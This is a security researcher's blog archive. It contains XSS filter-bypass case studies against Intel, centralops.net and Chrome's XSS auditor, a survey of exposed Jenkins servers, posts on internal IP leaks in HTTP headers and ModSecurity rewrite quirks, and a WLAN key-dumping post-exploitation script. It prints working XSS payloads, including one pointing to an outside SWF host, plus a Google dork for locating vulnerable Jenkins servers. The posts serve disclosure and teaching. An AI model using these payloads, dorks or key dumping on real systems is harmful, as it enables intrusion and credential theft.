Pages

Sunday, February 16, 2014

Intel XSS and Google Chrome XSS Auditor Bypass : Application Design Matters! Its True !


Last time, I talked about the role of application design in impacting the state of client-side XSS filters. You can read that blog post here: http://zeroknock.blogspot.com/2013/12/web-application-design-does-matter.html. However, concentrating on that hypothesis, another case study came to my notice. I notified a Cross-site Scripting (XSS) bug in the Intel retailer website. The Intel security team removed the vulnerable web page from the its Internet facing environment. Responsible disclosure is the way to go.

What's the learning lesson here? Occurrences of XSS vulnerabilities are not new but the interesting part is how the vulnerable application impacts the browser defined security components such as XSS filters. In this case study, Google Chrome XSS auditor (enabled by default) again fails to perform the desired work for what is designed for.

The idea here is not to show that there is an XSS bug in Intel website rather to show execution of XSS payloads depends on the application design and there is always an unexpected behavior. Even sophisticated client-side XSS filters can be bypassed easily. I do not have time to investigate what caused the XSS payload to bypass Chrome's XSS auditor. I will notify the Google Chrome team so that they can take a look into it.

Proof-of-Concept: I used the very simple payload : JavaScript:alert(document.cookie) in "URL" parameter for the vulnerable redirect.asp webpage.

Injected XSS Payload !

The payload gets embedded as a hyperlink in the webpage. Amazingly, the XSS auditor accepted to render that payload. So, the XSS injection worked successfully and resulted in cookie extraction.

Successful XSS Injection !
Keep on trying !

Tuesday, January 07, 2014

Code Nuances (or Bypassing XSS Filters) : Centralops.net Case Study

It is always fun to play around with deployed security mechanisms that are used for subverting application layer attacks. It is much more interesting to target applications enabled with protections (or that throw code nuances)  rather attacking protection-free applications. A simple case study of centralops.net is presented below.

Acknowledgement: I would like to thank Gavin from Hexillion Group (http://hexillion.com/) for patching this issue within few hours.

Case Study: Recently working on a domain dossier (http:///www.centralops.net) website for my ongoing research, I came across with interesting scenario where I have to bypass some glitches in the code (or filter) to execute the XSS code. I wanted to perform link injection with payload :
"/>&<a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
Error due to Injection !

The error I encountered was: "has multiple items separated by spaces, but only one input is allowed at a time. Domain Dossier will continue with"

The error clearly indicates that the input has to be provided as one value. It means the injection payload has to be pushed as one value. I tried a number of payloads with different meta characters which resulted in same responses until I found the XSS payload that bypassed everything in this scenario.  I played around with the white spaces and tried to remove them with certain characters that allowed me to execute the JavaScript (one can find more payloads but depending on the time, I was satisfied with that because the bypass was done already). Overall it was a game play for 10 minutes.

Original : "/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>
Bypass: "/><a//href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>
Bypass: "/><a/href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>
Note: I used "/", "//" and "_" characters to treat the payload as one value and pushed it. As a result injection occurs as follows:

Successful Rendering of XSS Payload !
 The supplied payload resulted in successful XSS injection in the target application.

Successful Execution of Payload !

What do we learn from this?
During past years, I feel its more important to understand how exactly the attack is executed (analyzing the underlying components) . As per my experience, one attack vector might not work in all target environments, so we have to build a new one every time. In a number of earlier scenarios, I have seen that if we tamper the whitespaces between HTML attributes and tags, the code fails to render properly in the application. But, in this case study, we are required to embed additional characters in the payload for passing the payload as one value to the application.

Inference: 

(1) Understand the error and develop appropriate combinations to overcome nuances (or bypass XSS filters).
(2) Design XSS payload as per target environment.

Enjoy !

Wednesday, January 01, 2014

Reported Jenkins Vulnerability Patched by BlackBerry !

A couple of months ago, I discussed about the existence of configuration flaws in deployment of  Jenkins software management application. The details are presented here: Jenkins Configuration Issues. Based on the same benchmark, I reported a few vulnerabilities to BlackBerry in its infrastructure. Recently, I found that they added my name to the responsible disclosure list here: BlackBerry Responsible Disclosure List!.which is fine as long as the team eradicates the vulnerability.

Nowadays, I do not perform aggressive vulnerability hunting (due to my ongoing job) but, when I have time, I dissect components of widely used software and try to find flaws in them. I am more interested in the cases where companies understand the problem and ready to patch it. I am not at all inclined towards finding generic issues in websites which nobody cares about. I always believe that it is important to understand the cons associated with that existing vulnerability when it is reported. It is also crucial to determine how the attacker can chain together a set of bugs to have greater impact. If we don't understand the nitty-gritty details of the vulnerability, there is high chances that the vulnerability will resurface again. 

In this case of BlackBerry, unnecessary exposure of Jenkins component in production environment could resulted in  problematic scenarios. Exposed components of Jenkins were vulnerable to  flaws such as Injections, XSS, etc. So, the belief is: "Expose Less and Be Secure !"

Note: I am going to reveal Frame Injection vulnerability to Jenkins team so that the issue can be patched. No details for now.

Enjoy !

Sunday, December 29, 2013

Web Application Design Does Matter - Google Chrome XSS Auditor Bypass : Version <= 32.0.1700.41 m Aura !

Update (6th March 2014) : The post is also discussed on Stack Overflow here: https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms, for additional discussion by the users.

Update: The bug has been reported to Google Chrome team already. The details can be found here: https://code.google.com/p/chromium/issues/detail?id=330972. The team was not able to recreate the issue in the test environment. I validated this issue on the Command and Control (C&C) panel of a botnet :) and I was not in a state to reveal the details of that panel. Anyways the bug is in Wont Fix state and Google Chrome is still vulnerable to these types of XSS bypasses.

Recently, I encountered an XSS auditor bypass in Google Chrome ( &lt;= 32.0.1700.41 m Aura) while working on my research.

Google Chrome Latest Version Tested !
Although, the XSS auditor in Google Chrome is a client-side XSS filter that eradicates the reflective XSS attacks right away. One point that should be taken into consideration that, sometimes the design of the web application also impacts the working of XSS auditor leading to creating such scenarios which are not expected. Anyways, let's analyze a bypass in latest (and earlier) versions of Google Chrome browser. The web page URL looks like as follows:
http://www.example.com/index.php?m=login which generates the form as follows:

For Injection, we crafted the URL as follows:
http://www.example.com/index.php/" onmouseover="JavaScript:alert(document.location)" name="?m=login . 
In this injection, we have not injected in "m" parameter rather we have played with the URI structure. The idea is to tweak the form layout rather the value accepted by the "m" parameter. If you place your injection in "m" parameter, it gets nullified by the XSS Auditor. Let's see how the injection occurs:

As a result, Google Chrome XSS auditor is bypassed.

Inference: Few ideas that should be taken into consideration:

1. The design of web applications impact the XSS auditor.
2. Instead of always targeting the HTTP parameters, play around with the URI structure also.

Note: Internet Explorer blocked this vector.

Additional Readings: Check out the inside details of Google Chrome XSS Auditor:
Enjoy !

Sunday, August 25, 2013

CCTV Cameras : An Interview for Fact or Fictional Show : Revision 3!

Recently, I did an interesting interview with Veronica from Fact or Fictional show on the Internet. We discussed about the issues and technology behind CCTV cameras. 


Do not forget to watch the movie on this topic-- "Closed Circuit" ! starring Eric Bana and Rebecca Hall.



Protect Your Software Development Web Interfaces - Information Lumps: A Case Study of Jenkins !

Automation of software development practices through applications has become the defacto standard in the security industry. Organizations are using support applications to reduce the workload in building and updating software.  The basic idea behind this post is to check how security is structured for software management applications such as Jenkins in a real time scenarios and what we need to look into while performing security assessments. Before discussing further, let's talk about Jenkins. According to the software website: "Jenkins is an application that monitors executions of repeated jobs, such as building a software project or jobs run by cron.". For more details, you can read here: https://wiki.jenkins-ci.org/display/JENKINS/Meet+Jenkins.

From software development perspective, Jenkins provides an integrated system which developers can use to manage software changes made to specific projects. It has been noticed that, although organizations use this software, but misconfigured interfaces (not running inside firewall and improper access rights) could have substantial impact. From security perspective, exposure of an integrated system that manages software development model could become a sensitive risk. To prove this fact, a case study of Jenkins application is discussed in which it is shown that how misconfigured and exposed interfaces could result in potential security glitches. 

These tests are conducted in an open environment. It has been found that several of the big companies use Jenkins and with no surprises the interfaces are exposed and running with improper authentication. In addition to this, there are numbers of Jenkins systems that are Internet facing and expose plethora of information to the attackers (remote users). A misconfigured Jenkins server results in disclosure of critical information that can be used in different set of attacks. A number of misconfiguration issues are presented below that result in information disclosure: 

Note: Based on this security issues, a few vulnerabilities have been reported to industry leaders (organizations) which have recognized the issue. I will release the details once the issue is patched.

Developers Information: Exposed Jenkins interface reveals information about the developers participating in the software projects. It is possible to extract userids of the registered accounts with associated names. This is a substantial point of gaining information about the users of a specific organization. An example of the exposed user details is shown below:

Exposed Developers Information !

Software Builds Information and Source Codes: It is possible to gain information about the software builds without any authentication (misconfigured scenarios).  Information about the changes in the software over a passage of time reveals information about the development flow of the components. Jenkins application does not ask for any explicit permission from the administrators to validate the user before accessing the ongoing software builds.  An example is shown below:

Exposed Software Build and Version numbers !
In certain scenarios, it is also possible to download the source code from the Jenkins without any authentication. Although for making changes to the code, you require credentials but the fun part is you can download code without them. Take a look at the example shown below:

Source Code Files !
Server-side Information Disclosure in Environment Variables: Access to environment variables also provides plethora of information. Example presented below shows the significant information about the configure MySQL (JDBC) database server. The attacker can easily glean username and password of the database (SONAR_JDBC_USERNAME & SONAR_JDBC_PASSWORD) including the internal IP address with port number on which JDBC service is running. 

Revealed Environment Information !

Exposure of Application Secret Data: During analysis, it has been found that a number of server side scripts have hard coded critical information such as secret-keys and credentials which can be exposed when console-output operations are performed. The underlined example shows how a secret key is extracted by accessing the console-output.  In this example, the curl command uses a secret key to connect to a specific domain for fetching JSON data through GET request. Once this information is exposed, the attacker can directly perform queries with the target domain. 

Revealed Secret Key !

Cron Jobs Execution: It is also possible to start the cron jobs which reveal plethora of information due to the usage of debugging calls. The majority of the time cron jobs produce a heck lot of output showing the success of running software. The example shown below presents the creation of database by a specific cron job in one of the vulnerable Jenkins configuration. It reveals how the table of OAUTH tokens is created and index is generated. 

Information Leakage through Cron Jobs !

Information Disclosure in Debug Errors: During a quick check in certain Jenkins configurations, it has been noticed that the Jenkins server does not handle the requests to restricted resources in a secure manner. The attacker can perform additional steps to request access to restricted resources to generated debug errors as shown below: 

Information Disclosure in DEBUG Errors !
Some of the standard requests specific to Jenkins are shown below:
Explicit CSRF Protection: It is always a good practice to analyze the design of the application from security standards. Some security standards should be deployed in the application by default. For example: - Jenkins provides a global security option in which protection against CSRF attacks have to be explicitly checked. If this option is not checked, the Jenkins application fails to deploy the protection globally. During our analysis, it has been noticed a number of Jenkins systems are running without CSRF protection which makes them vulnerable to critical web attacks.

Explicit Security Configuration !
SSH Endpoint Disclosure: Jenkins implements a SSH random port feature in which the software randomize the port selection for running SSH service. Typically, when a client sends a GET request, Jenkins replies back with "X-SSH-Endpoint" HTTP header which leverages the information in the form of host: port. It means SSH service is listening on following host with given port number. If the system is already exposed on the Internet, the attacker can easily glean information about the port number on which SSH server is listening. A real time example of a server running Jenkins is shown below:

SSH Endpoint Disclosure !

This information discussed in this post only provides a glimpse of security risks associated with the poorly administered software managing applications. These applications can provide a potential beef for the attackers to gain substantial amount of information about the organization and server side environment which facilitates the additional attacks.


For replicating the issues, trigger Google dork as: intitle: "Dashboard [Jenkins]" for getting a list of Jenkins server available on the Internet.

Impacts: As shown above, the misconfigured software management applications can have severe impacts as discussed below:
  • Information about developers can be used to conduct Phishing attacks including social engineering trickery to launch targeted attacks.
  •  A common mistake for not enabling the CSRF protection exposes the Jenkins environment to number of critical web vulnerabilities such as Cross-site File uploading.
  • In appropriate error handling discloses information about the different stack traces and internal components of the software.
  • Unrestricted cron jobs will result in successful running of different builds of the software. As shown above, information disclosed in the console output results in leakage of sensitive data such as secret keys. The attacker can use the secret keys to attack target servers.
  • Disclosure of software build information provides an attacker with a complete knowledge of the updates and modification that have taken place in the software. This information is beneficial for hunting security vulnerabilities or design analysis.


Recommendations:
  •  For software development and management interfaces, restrict the access completely. It is highly recommended that the server should be configured with complete authentication. It means no functionality of the application should be allowed to be accessed without authentication or in a default state.
  • Simply removing the HTTP links from interfaces is not a robust way to restrict access. The links can be fuzzed easily to gain access to hidden functionality. Deploy security features using a global configuration.
  • Standard security protection mechanism should be enabled by default without asking any preferences from the users or administrators.
  • Administrator should verify the new account creation in software like Jenkins before an access is granted to the registered user.


Configure Well and Be Secure!

Sunday, August 04, 2013

BlackHat USA Arsenal 2013 : Sparty - A FrontPage and SharePoint Security Auditing Tool

Last week, I released the first version of Sparty tool at BlackHat USA Arsenal 2013. The tool helps the penetration testers to check standard security flaws in the deployment of FrontPage and SharePoint web software. The tool is an outcome of the security issues that have been found on the wide deployments of these web software.

I had an interesting discussion with Tom Gallagher from Microsoft who worked on the FrontPage and SharePoint security and related developments. I got very good feedback which I will incorporate in the next feature.  Gursev also provided some impressive points which I will work on.

Sparty is hosted here : http://sparty.secniche.org/

Enjoy and feel free to provide any feedback.

Wednesday, July 17, 2013

Internal IP Address Disclosure over HTTP Protocol Channel : Information Revealing Headers !

The disclosure of internal IP addresses to remote users reveals a substantial layout of the organizational network. It is highly advised that the web servers should not disclose internal IP addresses in the HTTP response headers. In a real time scenarios, this is not the case. The majority of web servers, load balancing devices and web applications disclose this information. This post simply discusses the different ways through which internal IP addresses are revealed over HTTP protocol.

You can read more about HTTP 1.1 specifications and working here: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html

1. Location Response-Header Field:  This response header is basically used for redirecting the HTTP request to a new location. It results in 201 response code when resource is dynamically created during the request. The 3xx (redirection 301, 302, 303, 304, 305, 306, 307) response value shows that location is predetermined by the web server and is the preferred one.

2. Content-Location: Similarly, Content-Location response header also discloses the internal IP address. This header presents a location of the resource when it is accessible on a separate URI in addition to the HTTP request. There is a potential issue in IIS web servers which reveal internal IP address in Content-Location header while redirecting the browser. More details can be read here: http://www.rapid7.com/vulndb/lookup/http-iis-0065

There is a difference between in the usage of Location and Content-Location HTTP response headers. For reference, you can read this blog entry: http://www.subbu.org/blog/2008/10/location-vs-content-location.

3. Via Header Field: This HTTP response is header is distributed by gateways and proxies present between the client (user agents - browsers) and the web server. The basic functionality of Via header field is to track message forwarding, avoid loops during processing and identifying protocol capabilities. Generally, this header reveals the internal IP address of the configured gateway or proxy as shown below:

 4. X-Cache Header: This response header is thrown by transparent proxies deployed as an intermediate agent between the client and server. The idea is to simply reduce the direct load on the website by placing a copy in the cache and responding with the same when HTTP request is initiated by the client. There are other functionalities associated with transparent proxies also. The internal IP address can be revealed in two scenarios as discussed below:

4.1 X-Cache Miss: When the transparent proxy does not have a local copy of the website or web pages requested by the client.

4.2 X- Cache Hit:  When the transparent proxy has a local copy of the website or requested web pages.

You can read more about the X-Cache headers here: http://anothersysadmin.wordpress.com/2008/04/22/x-cache-and-x-cache-lookup-headers-explained/

5. Set-Cookie Header:  A number of load balancing devices use Set-Cookie for setting custom content as a part of communication channel to activate the session with the backend web server. The internal IP address can also be disclosed as a part of Set-Cookie parameter. A simple example is the BIG IP devices which basically reveal the internal IP address in binary encoded form.  Be default, it is the functionality of BIG IP devices to handle HTTP connection pooling based on IP addresses. In the screenshot shown below, the pool parameter holds the value of internal IP address

In my earlier presentations (couple of years ago), I talked about extracting the IP address from the BIG IP http_pool Set-Cookie parameter. The concept is shown below.


These are the some of the HTTP headers over which internal IP is exposed. While deployment, one should verify and validate that these headers should not expose unnecessary information.

Note: If anyone has additional information regarding Internal IP address disclosure over HTTP channel, let me know and I will update this entry. The idea is to collect all the metrics.

Enjoy!

Monday, May 20, 2013

Contrarisk Security Podcast Series: A Talk on Socioware!


I recently did a podcast on the Socioware with Steve from Contrarisk.

"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."

Listen to the podcast here: http://contrarisk.com/2013/05/19/csp-0011/

Saturday, May 04, 2013

Saturday, April 27, 2013

(Pentest Apache #3) - The Nature of # (%23) Character | Mod Security Rules in Apache


In my earlier posts, I have talked about  some interesting issues in deployed modules in Apache and insecure configuration. Refer here:

1. (Pentest Apache #1) Exposed Apache Axis - SOAP Objects
2. (Pentest Apache #2) - The Beauty of "%3F" and Apache's Inability | Wordpress | Mod Security

In this post, I want to discuss an interesting issue that occurs due to misconfigured rules in modsecurity. It is not a severe issue but it helps the penetration tester to gain some additional information about the server-side environment. For example:- directory listing.

In modsecurity, NE is stated as No Escape. One can explicitly configure the rules with this flag to implement no escaping. For example: "#" will be converted to "%23" if NE flag is not set.  If NE flag is set , the "#" character is treated as such and processed accordingly.  For more about modsecurity flags, refer here: http://httpd.apache.org/docs/2.2/rewrite/flags.html.  An example taken from there:


"RewriteRule ^/anchor/(.+) /bigpage.html#$1 [NE,R]. This example will redirect /anchor/xyz to /bigpage.html#xyz."

If escaping is not set properly in addition to some misconfiguration issue, it could result in unexpected behavior. I have noticed this flaw plethora of times during a number of security assessments. Let's have a look at one of the real time example:-


URL pattern 1: http://www.example.com/temp/#htaccess.cl
URL pattern 2: http://www.example.com/temp/%23htaccess.cl

In case (1), if NE flag is set, the URL has to be processed with "#" character. In case (2), if NE flag is not set, the URL has to be processed with "%23", hexadecimal notation of the character "#". But due to misconfiguration, the behavior changes.

The tested server is : Apache/2.2.14. Actually, both URLs are responded with 200 OK responses. In case (1), the output results in directory listing. In case (2), the output results in content of the file htaccess.cl.

Case 1: Content-Type is text/html;charset=UTF-8


With # Character 
Case 2: Content-Type is text/plain


With %23 Character

It could be a one reason that file name starts with "#" character. But, the primary reason is the inability of Apache to understand misconfigured URL rewriting rules. Usually, if the URL rewriting rule fails, the web server should respond in 404 error message. In case of misconfiguration, the fall back step is the directory listing, atleast that what I have seen in practical scenarios (it could be different).

Inference: Play around with URL rewriting rules to detect bypasses which could result in gleaning additional information.

Tuesday, April 09, 2013

A Sweet Script to Dump Keys from Wlan Profiles - Post Exploitation (or Regular Use)

Update: Just found that PaulDotCom has written over this blog post in episode 327: http://pauldotcom.com/wiki/index.php/Episode327.

"This is a great example of so many things. First, its a really neat little script (though I imagine the powershell junkies will be excited to convert it). It highlights the importance of post-exploitation. But that is really just a term for us gear heads. What this means for the organization is terrible. It means you can exploit systems that really don't seem to matter, maybe Jane's computer was compromised and didn't have any sensitive data on it and her account does not. However, Jane connects to the same "secure" wireless network as more important people, say Bob from finance. Now, a small little hole, like a missing Adobe patch, just caughed up the keys to your kingdom. It means that vulnerabilities and risk have this weird relationship and its one of the toughest things to understand, until you have a pen test."

After exploitation, retrieving data from the compromised machine is always an interesting scenario. Considering the time factor, even a small automation is productive. Running a same command several times is  not bad but its better to take a next step.

The below presented script helps to dump security keys for all the wlan profiles present on the compromised system (if you have an administrator access). I use this sweet script to do the work so use it when ever you want.

Wlan Profiles - Security Keys Dumping Script

It outputs as:



Fetch the batch script from here: http://www.secniche.org/tools/dump_wlan_config.txt

Enjoy !